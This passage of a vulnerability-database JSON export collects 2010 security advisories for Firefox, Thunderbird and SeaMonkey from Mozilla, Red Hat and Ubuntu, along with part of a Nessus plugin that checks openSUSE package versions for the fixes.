attacker-controlled memory.\n\nMFSA 2010-67 / CVE-2010-3183: Security researcher regenrecht reported\nvia TippingPoint's Zero Day Initiative that when\nwindow.__lookupGetter__ is called with no arguments the code assumes\nthe top JavaScript stack value is a property name. Since there were no\narguments passed into the function, the top value could represent\nuninitialized memory or a pointer to a previously freed JavaScript\nobject. Under such circumstances the value is passed to another\nsubroutine which calls through the dangling pointer, potentially\nexecuting attacker-controlled memory.\n\nMFSA 2010-68 / CVE-2010-3177: Google security researcher Robert\nSwiecki reported that functions used by the Gopher parser to convert\ntext to HTML tags could be exploited to turn text into executable\nJavaScript. If an attacker could create a file or directory on a\nGopher server with the encoded script as part of its name the script\nwould then run in a victim's browser within the context of the site.\n\nMFSA 2010-69 / CVE-2010-3178: Security researcher Eduardo Vela Nava\nreported that if a web page opened a new window and used a javascript:\nURL to make a modal call, such as alert(), then subsequently navigated\nthe page to a different domain, once the modal call returned the\nopener of the window could get access to objects in the navigated\nwindow. This is a violation of the same-origin policy and could be\nused by an attacker to steal information from another website.\n\nMFSA 2010-70 / CVE-2010-3170: Security researcher Richard Moore\nreported that when an SSL certificate was created with a common name\ncontaining a wildcard followed by a partial IP address a valid SSL\nconnection could be established with a server whose IP address matched\nthe wildcard range by browsing directly to the IP address. It is\nextremely unlikely that such a certificate would be issued by a\nCertificate Authority.\n\nMFSA 2010-71 / CVE-2010-3182: Dmitri Gribenko reported that the script\nused to launch Mozilla applications on Linux was effectively including\nthe current working directory in the LD_LIBRARY_PATH environment\nvariable. If an attacker was able to place into the current working\ndirectory a malicious shared library with the same name as a library\nthat the bootstrapping script depends on the attacker could have their\nlibrary loaded instead of the legitimate library.\n\nMFSA 2010-73 / CVE-2010-3765: Morten Kråkvik of Telenor SOC\nreported an exploit targeting particular versions of Firefox 3.6 on\nWindows XP that Telenor found while investigating an intrusion attempt\non a customer network. The underlying vulnerability, however, was\npresent on both the Firefox 3.5 and Firefox 3.6 development branches\nand affected all supported platforms.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=645315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649492\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-js192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-3.6.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-branding-upstream-3.6.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-translations-common-3.6.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"MozillaFirefox-translations-other-3.6.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-js192-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner192-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner192-buildsymbols-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner192-devel-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner192-gnome-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-xulrunner192-translations-other-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-js192-32bit-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:40:42", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "i686", "packageName": "firefox-debuginfo", "packageFilename": "firefox-debuginfo-3.6.12-1.el6_0.i686.rpm", "operator": "lt"}], "description": "Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nA race condition flaw was found in the way Firefox handled Document Object\nModel (DOM) element properties. Malicious HTML content could cause Firefox\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183,\nCVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running Firefox, allow arbitrary JavaScript to be executed in the\ncontext of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could\ncreate a malicious web page that, when viewed by a victim, could steal\nprivate data from a different website the victim had loaded with Firefox.\n(CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nFirefox, if that user ran Firefox from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.6.11 and 3.6.12. You can find links to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.6.12, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n", "reporter": "RedHat", "published": "2010-11-10T05:00:00", "type": "redhat", "title": "(RHSA-2010:0861) Critical: firefox security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183", "CVE-2010-3765"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:18", "id": "RHSA-2010:0861", "href": "https://access.redhat.com/errata/RHSA-2010:0861", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:43:24", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "i686", "packageName": "thunderbird-debuginfo", "packageFilename": "thunderbird-debuginfo-3.1.6-1.el6_0.i686.rpm", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nA race condition flaw was found in the way Thunderbird handled Document\nObject Model (DOM) element properties. An HTML mail message containing\nmalicious content could cause Thunderbird to crash or, potentially, execute\narbitrary code with the privileges of the user running Thunderbird.\n(CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179,\nCVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML\ncontent could steal private data from different remote HTML content\nThunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above\nissues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a \".\" character, which could allow a\nlocal attacker to execute arbitrary code with the privileges of a different\nuser running Thunderbird, if that user ran Thunderbird from within an\nattacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n", "reporter": "RedHat", "published": "2010-11-17T05:00:00", "type": "redhat", "title": "(RHSA-2010:0896) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183", "CVE-2010-3765"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:28", "id": "RHSA-2010:0896", "href": "https://access.redhat.com/errata/RHSA-2010:0896", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:45:10", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "i386", "packageName": "firefox", "packageFilename": "firefox-3.6.11-2.el4.i386.rpm", "operator": "lt"}], "description": "Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox. Network Security Services (NSS) is\na set of libraries designed to support the development of security-enabled\nclient and server applications.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183,\nCVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running Firefox, allow arbitrary JavaScript to be executed in the\ncontext of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could\ncreate a malicious web page that, when viewed by a victim, could steal\nprivate data from a different website the victim has loaded with Firefox.\n(CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nFirefox, if that user ran Firefox from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nThis update also provides NSS version 3.12.8 which is required by the\nupdated Firefox version, fixing the following security issues:\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in Firefox accepted DHE keys that were 256\nbits in length. This update removes support for 256 bit DHE keys, as such\nkeys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way NSS matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. NSS incorrectly accepted connections to IP addresses that fell\nwithin the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.6.11. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.6.11, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n", "reporter": "RedHat", "published": "2010-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0782) Critical: firefox security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3170", "CVE-2010-3173", "CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:55", "id": "RHSA-2010:0782", "href": "https://access.redhat.com/errata/RHSA-2010:0782", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:42:54", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.i386.rpm", "operator": "lt"}], "description": "SeaMonkey is an open source web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2010-3176, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in SeaMonkey converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running SeaMonkey, allow arbitrary JavaScript to be executed in\nthe context of the Gopher domain. (CVE-2010-3177)\n\nA flaw was found in the script that launches SeaMonkey. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nSeaMonkey, if that user ran SeaMonkey from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in SeaMonkey accepted DHE keys that were\n256 bits in length. This update removes support for 256 bit DHE keys, as\nsuch keys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way SeaMonkey matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. SeaMonkey incorrectly accepted connections to IP addresses that\nfell within the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\n", "reporter": "RedHat", "published": "2010-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0781) Critical: seamonkey security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3170", "CVE-2010-3173", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3180", "CVE-2010-3182"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:17", "id": "RHSA-2010:0781", "href": "https://access.redhat.com/errata/RHSA-2010:0781", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:28", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "i386", "packageName": "thunderbird", "packageFilename": "thunderbird-1.5.0.12-31.el4.i386.rpm", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2010-3176, CVE-2010-3180)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above\nissues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a \".\" character, which could allow a\nlocal attacker to execute arbitrary code with the privileges of a different\nuser running Thunderbird, if that user ran Thunderbird from within an\nattacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n", "reporter": "RedHat", "published": "2010-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0780) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3182"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:54", "id": "RHSA-2010:0780", "href": "https://access.redhat.com/errata/RHSA-2010:0780", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:33", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3182", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3175", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3183", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3176", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3179", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3178", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3177", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3180"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}], "description": "Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref, Gary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski discovered various flaws in the browser engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws in the JavaScript engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nRobert Swiecki discovered that Firefox did not properly validate Gopher URLs. If a user were tricked into opening a crafted file via Gopher, an attacker could possibly run arbitrary JavaScript. (CVE-2010-3177)\n\nEduardo Vela Nava discovered that Firefox could be made to violate the same-origin policy by using modal calls with JavaScript. An attacker could exploit this to steal information from another site. (CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Firefox did not properly setup the LD_LIBRARY_PATH environment variable. A local attacker could exploit this to execute arbitrary code as the user invoking the program. (CVE-2010-3182)", "edition": 3, "reporter": "Ubuntu", "published": "2010-10-20T00:00:00", "title": "Firefox and Xulrunner vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2010-10-20T00:00:00", "id": "USN-997-1", "href": "https://usn.ubuntu.com/997-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:56", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3182", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3175", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3183", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3176", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3179", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3178", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3180"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.1.5+build1+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.9+build1+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": "Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref, Gary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski discovered various flaws in the browser engine. An attacker could exploit this to crash Thunderbird or possibly run arbitrary code as the user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws in the JavaScript engine. If JavaScript were enabled, an attacker could exploit this to crash Thunderbird or possibly run arbitrary code as the user invoking the program. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nEduardo Vela Nava discovered that Thunderbird could be made to violate the same-origin policy by using modal calls with JavaScript. If JavaScript were enabled, an attacker could exploit this to steal information from another site. (CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Thunderbird did not properly setup the LD_LIBRARY_PATH environment variable. A local attacker could exploit this to execute arbitrary code as the user invoking the program. (CVE-2010-3182)", "edition": 3, "reporter": "Ubuntu", "published": "2010-10-20T00:00:00", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2010-10-20T00:00:00", "id": "USN-998-1", "href": "https://usn.ubuntu.com/998-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:02", "references": ["https://usn.ubuntu.com/usn/usn-1011-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3765"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.0.0.24+build1+nobinonly-0ubuntu0.9.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": 